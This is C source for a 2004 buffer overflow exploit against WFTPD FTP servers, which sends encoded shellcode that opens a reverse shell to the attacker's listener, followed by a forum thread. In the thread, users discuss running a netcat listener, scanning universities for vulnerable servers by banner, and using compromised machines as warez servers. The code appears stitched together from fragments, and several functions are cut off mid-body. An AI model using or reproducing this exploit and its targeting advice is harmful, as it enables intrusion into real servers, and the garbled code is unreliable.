/* * WFTPD buffer overflow exploit, (c) axl 2004, rdxaxl@hotmail.com * Discovered by the very same guy :p * * Tested WFTPD versions: * * - WFTPD Pro Server 3.21 Release 1 (trial) (latest version) * - WFTPD Pro Server 3.20 Release 2 (trial) * - WFTPD Server 3.21 Release 1 (trial) (latest version) * - WFTPD Server 3.10 Release 1 (trial) * * Tested exploit with these remote operating systems: * * - Windows XP Pro, SP1 * * Should be very easy to support other Windows OSes. You may only have * to update ret_addr. */
/*
 * SEH handler overwrite target: the little-endian address of a
 * "pop reg / pop reg / ret" gadget in kernel32.dll 5.1.2600.1106
 * (Windows XP Pro SP1, EN). The value is build-specific: on any other
 * OS / service-pack / language build the gadget is not at this location,
 * so the overflow most likely just crashes the service instead of
 * reaching the shellcode (the header comment says only ret_addr needs
 * updating to support other targets).
 */
#if defined(OLDCODE)
static char* ret_addr = "\xAC\x9C\xEC\x77"; /* 0x77EC9CAC: pop reg / pop reg / ret */
#else
/* See the comment in exploit() for why this particular address was chosen. */
static char* ret_addr = "\x5B\xC0\xEB\x77"; /* 0x77EBC05B: pop reg / pop reg / ret */
#endif
while (1) { if (!isrd(s)) return 1; if (recv(s, inbuf, sizeof(inbuf), 0) < 0) return 0; } }
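/*
 * Read one FTP reply from the server and return its three-digit status
 * code, or -1 on a read error or a malformed reply.
 *
 * Multi-line replies ("NNN-text" ... "NNN text") are consumed up to and
 * including the terminating "NNN " line so the next read starts on a
 * fresh reply.
 *
 * The reply comes from the remote server and is untrusted: the code is
 * only accepted when the first three characters are ASCII digits (the
 * original atoi() accepted e.g. "22x"), and `line` is measured before it
 * is indexed so a short line never reads past what get_line() filled in.
 */
int get_reply_code(SOCKET s)
{
    char line[MAXLINE];

    if (!get_line(s, line, sizeof(line))) {
        printf("[-] Could not get status code\n");
        return -1;
    }

    /* A reply needs at least "NNN " or "NNN-"; measure before indexing. */
    size_t len = strlen(line);
    if (len < 4) {
        printf("[-] Weird reply\n");
        return -1;
    }

    char sep = line[3];
    int all_digits = 1;
    for (int i = 0; i < 3; i++) {
        if (line[i] < '0' || line[i] > '9')
            all_digits = 0;
    }
    if (!(sep == ' ' || sep == '-') || !all_digits) {
        printf("[-] Weird reply\n");
        return -1;
    }

    int code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
    if (code == 0) {
        /* "000" is not a valid FTP reply code; keep rejecting it. */
        printf("[-] Weird reply\n");
        return -1;
    }

    if (sep == '-') {
        /* Multi-line reply: skip lines until the "NNN " terminator. */
        char endline[5];
        memcpy(endline, line, 3);
        endline[3] = ' ';
        endline[4] = '\0';
        for (;;) {
            if (!get_line(s, line, sizeof(line))) {
                printf("[-] Could not get next line\n");
                return -1;
            }
            /* strncmp stops at the NUL, so a short line is compared safely. */
            if (strncmp(line, endline, 4) == 0)
                break;
        }
    }

    return code;
}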
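/*
 * Send all `len` bytes of `buf`, looping over partial sends.
 *
 * Returns 1 when every byte was handed to send(), 0 when send() failed or
 * reported zero bytes. A negative `len` is rejected up front instead of
 * being passed to send() as a bogus length (which fails anyway, so the
 * observable result, 0, is unchanged).
 */
int sendb(SOCKET s, const char* buf, int len, int flags)
{
    if (len < 0)
        return 0;

    const char* p = buf;
    int remaining = len;
    while (remaining > 0) {
        int n = send(s, p, remaining, flags);
        if (n <= 0)
            break; /* error (or nothing sent): give up and report failure */
        p += n;
        remaining -= n;
    }

    return remaining == 0;
}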
/* Send a NUL-terminated string (without the terminator); see sendb(). */
int sends(SOCKET s, const char* buf, int flags)
{
    const int len = (int)strlen(buf);
    return sendb(s, buf, len, flags);
}
/*
 * Return 1 when byte `c` may appear in the payload, 0 when it is one of the
 * three bytes the exploit avoids (00h, 0Ah, 20h, as check_invd_bytes
 * reports them). Presumably NUL ends the string the server copies, LF ends
 * the FTP command line and space splits the argument — TODO confirm against
 * the server's parser; every other value, including 0Dh and >= 80h, passes.
 */
int is_valid_char(char c)
{
    switch (c) {
    case '\0':
    case '\n':
    case ' ':
        return 0;
    default:
        return 1;
    }
}
int add_bytes(void* dst, int& dstoffs, int dstlen, const void* src, int srclen) { if (dstoffs + srclen > dstlen || dstoffs + srclen < dstoffs) { printf("[-] Buffer overflow;)\n"); return 0; }
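/*
 * Verify that no byte of `buf` is one the FTP command channel would mangle
 * (see is_valid_char). On the first offending byte, print its index and
 * value and return 0; return 1 when all `buflen` bytes are clean.
 * `name` only labels the diagnostic.
 */
int check_invd_bytes(const char* name, const void* buf, int buflen)
{
    const unsigned char* bytes = (const unsigned char*)buf;

    for (int i = 0; i < buflen; i++) {
        if (!is_valid_char((char)bytes[i])) {
            /* Cast so %u and %02X receive the unsigned types they expect;
             * passing an int / a promoted signed char is undefined per the
             * standard (and would print FFFFFFxx for values >= 0x80). */
            printf("[-] %s[%u] (%02X) cannot contain bytes 00h, 0Ah, or 20h\n",
                   name, (unsigned)i, (unsigned)bytes[i]);
            return 0;
        }
    }

    return 1;
}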
/*
 * XOR-encode one byte so that neither the encoded byte nor the key byte is
 * a character the command channel rejects (see is_valid_char). On success
 * `c` is replaced by c ^ key, `k` receives the key and 1 is returned; 0 is
 * returned (after a diagnostic) if no such key exists in 0..FFh.
 *
 * This is bad-byte avoidance, not confidentiality: the decoder must know
 * the key (exploit() embeds it in the shellcode itself), so XOR with it
 * hides nothing from anyone who sees the payload.
 */
int enc_byte(char& c, char& k)
{
    int key = 0;
    while (key < 0x100) {
        const char keych = (char)key;
        const char encoded = (char)(c ^ key);
        if (is_valid_char(keych) && is_valid_char(encoded)) {
            c = encoded;
            k = keych;
            return 1;
        }
        key++;
    }

    /* NOTE(review): `c` is a (possibly signed) char, so values >= 80h would
     * print as FFFFFFxx here; in practice a key is found for every byte. */
    printf("[-] Could not find encryption key for byte %02X\n", c);
    return 0;
}
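/*
 * Find one key byte that XOR-encodes every byte buf[offs], buf[offs+step],
 * ... (while the index is below `size`) into a character the command
 * channel accepts, the key itself also being such a character. Returns the
 * key (0..FFh), or -1 after a diagnostic when no key exists or the
 * arguments are unusable.
 *
 * Fix: the original tested the inner for-loop index after the loop, which
 * only compiles under the pre-standard MSVC for-scope rule; the index now
 * lives in the enclosing scope. A step <= 0 would loop forever and a
 * negative offset would index before the buffer, so both are rejected.
 *
 * Like enc_byte this is bad-byte avoidance, not encryption: the key is
 * written into the payload (see exploit()), so it provides no secrecy.
 */
int get_enc_key(char* buf, int size, int offs, int step)
{
    if (step <= 0 || offs < 0) {
        printf("[-] Invalid encoding range (offs=%d, step=%d)\n", offs, step);
        return -1;
    }

    for (int key = 0; key < 0x100; key++) {
        if (!is_valid_char((char)key))
            continue;

        /* Walk the stride; stop at the first byte this key encodes badly. */
        int j = offs;
        while (j < size && is_valid_char((char)(buf[j] ^ key)))
            j += step;
        if (j < size)
            continue; /* some byte in this stride became a bad byte */

        return key;
    }

    printf("[-] Could not find an encryption key\n");
    return -1;
}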
int exploit(SOCKET s, unsigned long sip, unsigned short sport) { printf("[+] Trying buffer overflow + using SEH handler\n");
for (int i = 0; i < 4; i++) { int k = get_enc_key(&shellcode[shlc_offs_encstart], shlc_offs_encend-shlc_offs_encstart, i, 4); if (k < 0) __leave; shellcode[shlc_offs_enckey+i] = k; } printf("[+] Shellcode encryption key = %02X%02X%02X%02X\n", shellcode[shlc_offs_enckey+3], shellcode[shlc_offs_enckey+2], shellcode[shlc_offs_enckey+1], shellcode[shlc_offs_enckey]); for (int i = 0; i < shlc_offs_encend-shlc_offs_encstart; i++) shellcode[shlc_offs_encstart+i] ^= shellcode[shlc_offs_enckey + i % 4];
int main(int argc, char** argv) { printf("WFTPD <= v3.21r1 buffer overflow exploit, (c) axl 2004, rdxaxl@hotmail.com\n");
WSADATA wsa; if (WSAStartup(0x0202, &wsa)) return 1;
if (argc < 5) show_help(argv[0]);
unsigned long ip = ntohl(inet_addr(argv[1])); unsigned short port = (unsigned short)atoi(argv[2]); unsigned long sip = ntohl(inet_addr(argv[3])); unsigned short sport = (unsigned short)atoi(argv[4]); const char* username = "anonymous"; const char* userpass = "axl";
for (int i = 5; i < argc; i++) { if (!strcmp(argv[i], "-u") && i + 1 < argc) { username = argv[++i]; } else if (!strcmp(argv[i], "-p") && i + 1 < argc) { userpass = argv[++i]; } else if (!strcmp(argv[i], "-v") && i + 1 < argc) { if (!stricmp(argv[i+1], "p321")) ftpver = WFTPD_PRO_321_TRIAL; else if (!stricmp(argv[i+1], "p320")) ftpver = WFTPD_PRO_320_TRIAL; else if (!stricmp(argv[i+1], "321")) ftpver = WFTPD_321_TRIAL; else if (!stricmp(argv[i+1], "310")) ftpver = WFTPD_310_TRIAL; else show_help(argv[0]); i++; } else show_help(argv[0]); }
if (!ip || !port || !sip || !sport) show_help(argv[0]);
Isn't that Winsock? A little C knowledge is needed to compile the source (it uses the Winsock API and MSVC-specific constructs such as `__leave`).
usch
Feb 29 2004, 02:49 PM
I did some scans on several universities but only found one WFTPD, and it was the wrong version and did not allow anonymous login. So I can't recommend it to those who want to use such boxes as warez servers.
Hrm, I'm getting tired of this... :| You get one error, try something else, then something else, then something else, THEN go to www.google.com and read up on the headers and the errors. Sometimes I feel the nice people here look after the lazy and incapable like babies, hand-feeding them...
Hey TheRealGiant, nice that you posted the exploit, but the link doesn't work — I get a JPG file?!
edit:
ok link worx now thx alot!
TheRealGiant
Feb 29 2004, 04:33 PM
fixed
linuxwolf
Feb 29 2004, 04:39 PM
Now everyone bow down to him and say thank you for the god damn baby mush... >< A:OEGH:OIE@PIG@POj!~@PI!")(*£")(*&"
x1`
Feb 29 2004, 05:16 PM
Is this a remote shell, then? And should it work against servers that allow anonymous login?
usch
Feb 29 2004, 06:03 PM
Yes, it is a remote (reverse) shell: the shellcode connects back to the <sip>:<sport> listener you specify, and it works against anonymous login — the source defaults to user "anonymous" / pass "axl". Note that the included ret_addr is hard-coded for the tested Windows XP Pro SP1 (EN) kernel32 build; against other builds the return address has to be updated, as the header comment says.
AlexeyG
Feb 29 2004, 09:30 PM
Is there a banner scanner for this out there yet?
usch
Mar 1 2004, 05:58 AM
Use dsns (www.dsns.net), configure it to scan port 21 and grab the banner, match on [*WFTPD*], and start scanning. If you want, I can write a tutorial for you.
night^man
Mar 1 2004, 07:06 AM
Where can I get this Visual C++?
linuxwolf
Mar 1 2004, 07:56 AM
go buy it.
AlexeyG
Mar 1 2004, 03:38 PM
QUOTE (usch @ Mar 1 2004, 05:58 AM)
use dsns (www.dsns.net) , configure it to scan on port 21 (get banner) [*WFTPD*] and start scanning,if u want i can write a tutorial for you
lol, thank you, but your explanation is enough.
linuxwolf
Mar 1 2004, 03:40 PM
Also, there are plenty of banner scanners out there for *nix and Windows; if you want one in mIRC, ask.
(Just to clear up any confusion: I script (Perl, mIRC, PHP), and no, I do not use mIRC on Windows — it's a thing called Wine. The only time you'll catch me on Windows is playing CS or the UT2k4 beta demo....)
usch
Mar 1 2004, 04:20 PM
Why do you play CS on Windows? Isn't it available for Linux too?
OldSkool
Mar 1 2004, 04:23 PM
[+] Connecting to x.x.x.x:21... [+] Connected [+] Logging in... [+] Logged in [+] Trying buffer overflow + using SEH handler [+] Shellcode encryption key = 05050507 [+] Sending shellcode which will connect to x.x.x.x:x... [+] Shellcode sent successfully [+] Santa's watching you!
I am connected to a WFTPD account in FlashFXP but not sure what some of the exploit's arguments mean.
What do these mean?
<sip> <sport>
What is the 321:p320:321:310 at the end as well?
Also, do you use -u anonymous -p anonymous?
usch
Mar 1 2004, 06:34 PM
sip and sport are the IP address and port your own machine is listening on — the shellcode connects back to them. Start the listener first, e.g. `netcat -v -l -s yourip -p yourport`; it will receive the shell when the exploit succeeds.
And it should be `-u anonymous -p anyemail@address.com`: in the source, -u sets the username and -p the password (the defaults are anonymous / axl).
Nightdemon
Mar 2 2004, 02:48 PM
QUOTE (OldSkool @ Mar 1 2004, 04:23 PM)
[+] Connecting to x.x.x.x:21... [+] Connected [+] Logging in... [+] Logged in [+] Trying buffer overflow + using SEH handler [+] Shellcode encryption key = 05050507 [+] Sending shellcode which will connect to x.x.x.x:x... [+] Shellcode sent successfully [+] Santa's watching you!
Everything looked the same as this, but after "[+] Santa's watching you!" it stopped. Is that because it's not a WFTPD server? I didn't receive the shell... please tell me!
guy12
Mar 2 2004, 07:56 PM
Has anybody ever found this FTP server in the wild? ;-)
beenal
Mar 2 2004, 11:07 PM
QUOTE (Dickybob20 @ Mar 1 2004, 05:18 PM)
whats 321:p320:321:310 at the end as well ?
maybe you'll find out when you read the sourcecode
QUOTE (Nightdemon @ Mar 2 2004, 02:48 PM)
everything looked the same like this, but after [+] Santa's watching you!, it stopped Is that coz it's not a wftpd server, I didn't receive the shell, or what... tell me plz!
maybe you'll find out when you read the sourcecode
jesus
usch
Mar 3 2004, 01:20 PM
CODE
whats 321:p320:321:310 at the end as well ?
Those are the target versions for the -v flag, of course: p321 and p320 select WFTPD Pro 3.21 / 3.20, and 321 and 310 select WFTPD Server 3.21 / 3.10 (see the -v parsing in main()).
toost
Mar 5 2004, 11:18 AM
I have a little problem here.
I installed WFTPD version 3.21 (release 1) locally,
enabled anonymous login,
set some settings and started it.
Tried to log in as anonymous — that worked.
Then I started the exploit; it runs all the way through and says it is sending the shellcode to (the other IP on my network). On the other PC I have nc running and listening, but nothing ever connects to it — I have no firewall or anything. Anyone got a tip?
DumpZ
Mar 5 2004, 11:24 AM
Are you behind NAT? Many exploits that drop a reverse shell don't work when the listener is behind NAT: the shellcode connects back to <sip>:<sport>, so that address and port must be reachable from the target (port-forwarded, or on the same network segment).
toost
Mar 5 2004, 11:29 AM
Yes, I am, but I did it locally, so the traffic stays internal — it doesn't cross the NAT that way.